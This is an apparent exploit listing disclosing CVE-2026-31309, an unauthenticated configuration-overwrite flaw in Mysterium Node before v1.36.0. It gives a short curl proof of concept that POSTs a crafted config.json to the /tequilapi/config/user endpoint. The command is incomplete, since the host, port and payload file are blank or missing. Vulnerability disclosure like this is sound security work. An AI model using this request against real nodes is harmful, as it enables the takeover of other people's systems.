## https://sploitus.com/exploit?id=38A488BE-68E1-5A61-84FD-BDBEABF7FD17
# CVE-2026-31309: Broken Access Control in Mysterium Node before version 1.36.0
Improper authorization in the `/tequilapi/config/user` endpoint of Mysterium Node before `v1.36.0` allows unauthenticated attackers to arbitrarily overwrite the node's configuration and achieve a full node takeover via supplying a crafted POST request.
## PoC
```bash
curl -X POST \
"Content-Type: application/json" \
-d @config.json \
http://:/tequilapi/config/user
```
Discovered by Till Schacht.
## References
-
-